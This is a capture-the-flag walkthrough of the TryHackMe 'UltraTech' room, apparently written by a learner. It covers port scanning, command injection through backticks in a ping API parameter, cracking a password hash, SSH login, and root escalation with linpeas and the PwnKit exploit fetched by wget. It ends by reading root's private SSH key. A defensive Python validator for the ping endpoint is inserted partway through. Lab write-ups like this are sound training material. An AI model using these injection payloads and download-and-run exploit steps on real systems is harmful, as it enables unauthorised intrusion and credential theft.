TryHackMe: UltraTech

!#Tasks

##Task 1:

!>Deploy the machine

<>: Deploy the machine

> No answer needed

##Task 2:

!>It’s enumeration time!

<>: Which software is using the port 8081?

Command: sudo nmap -sS -sC -sV -oN nmap/initial 10.10.102.70

Ans: N******

<>: Which other non-standard port is used?

Command: sudo nmap -sT -p- -sV -T5 -oN nmap/all_ports 10.10.102.70

Ans: 3****

<>: Which software using this port?

Ans: A*****

<>: Which GNU/Linux distribution seems to be used?

Ans: U*****

<>: The software using the port 8080 is a REST api, how many of its routes are used by the web application?

Command: gobuster dir -u http://10.10.102.70:8081/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Ans: *

>: Let’s check the sites

>: Scan the port we just found

Command: gobuster dir -u http://10.10.102.70:31331/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

>: Let’s look at the /js path

>: Look at api.js

>: Let’s check how the API we found works

>: After checking and pinging, everything looks great

##Task 3:

!>Let the fun begin

! There is a database lying around, what is its filename?

Url: http://10.10.102.70:8081/ping?ip=`ls`

! What is the first user’s password hash?

http://10.10.102.70:8081/ping?ip=`cat%20u****.**.******`

Only one user's password can be cracked

! What is the password associated with this hash?

Url: https://www.md5online.org/md5-decrypt.html

>: Let’s check the entry with ssh

Command: ssh r00t@10.10.102.70
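The `/ping?ip=` requests above work because the backticks in the parameter get evaluated by a shell on the server. As an added example (not part of the original write-up and not the room's code), this Python sketch shows a handler-side check that only ever passes a literal IPv4 address to `ping` without a shell, plus a small audit function for logged request URLs. The function names, the `ping -c 1` invocation and the sample URLs are assumptions made for illustration.

```python
# Added example, not the room's code. All names are hypothetical.
# Assumed vulnerable pattern on the server: building "ping -c 1 " + ip and
# handing the string to a shell, which is what makes `ls` in the URL run.
import ipaddress
import re
from urllib.parse import urlsplit, parse_qs

# Characters that only make sense in the parameter if someone is probing a shell.
SHELL_META = re.compile(r"[`$;|&<>(){}\\\s]")

def ping_argv(ip_param):
    """Return an argv list for ping, or raise ValueError for anything but a literal IPv4."""
    addr = ipaddress.IPv4Address(ip_param)   # rejects `ls`, "1.1.1.1;id", hostnames
    # argv list, no shell: the value is never interpreted by /bin/sh
    return ["ping", "-c", "1", str(addr)]

def audit_request(url):
    """Classify one logged request URL as 'ok', 'rejected' or 'suspicious'."""
    parts = urlsplit(url)
    if parts.path != "/ping":
        return "ok"                          # other routes are out of scope here
    values = parse_qs(parts.query, keep_blank_values=True).get("ip", [])
    if len(values) != 1:
        return "rejected"                    # missing or repeated parameter
    try:
        ping_argv(values[0])
        return "ok"
    except ValueError:
        # Not an IP: flag it for review if it carries shell metacharacters
        return "suspicious" if SHELL_META.search(values[0]) else "rejected"

if __name__ == "__main__":
    # Constructed sample requests; the first one is the request from the write-up
    samples = [
        "http://10.10.102.70:8081/ping?ip=`ls`",
        "/ping?ip=127.0.0.1",
        "/ping?ip=127.0.0.1%20-f",
        "/ping?ip=example.com",
    ]
    for url in samples:
        print(audit_request(url), url)
```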

##Task 4:

!>The root of all evil

! What are the first 9 characters of the root user’s private SSH key?

>: Let’s look for vulnerabilities we can use to escalate privileges

>: We can do it manually. But I will use Linpeas.sh, an automated tool

>: You can download the tool here:

https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh

>: Let’s start the transfer

>: From our terminal
Command: python3 -m http.server 80

>: From target terminal
Command: wget http://10.8.223.65/linpeas.sh

>: Give permission and get started
Command: chmod +x linpeas.sh
Command: ./linpeas.sh

We found some vulnerabilities

>: I decided to use CVE-2021-4034

>: You can download the exploit here

>: Let’s start the transfer

>: From our terminal

Command: python3 -m http.server 80

>: From target terminal

Command: wget http://10.8.223.65/pwnkit.c

>: Prepare and start

Command: gcc pwnkit.c -o exploit

Command: ./exploit

And now we are root

Now let’s go and do the last task
Command: cat /root/.ssh/id_rsa

“If you have any questions or comments, please do not hesitate to write. Have a good day”

Hello, my name is Elman. I am from Azerbaijan. I wish you a good day
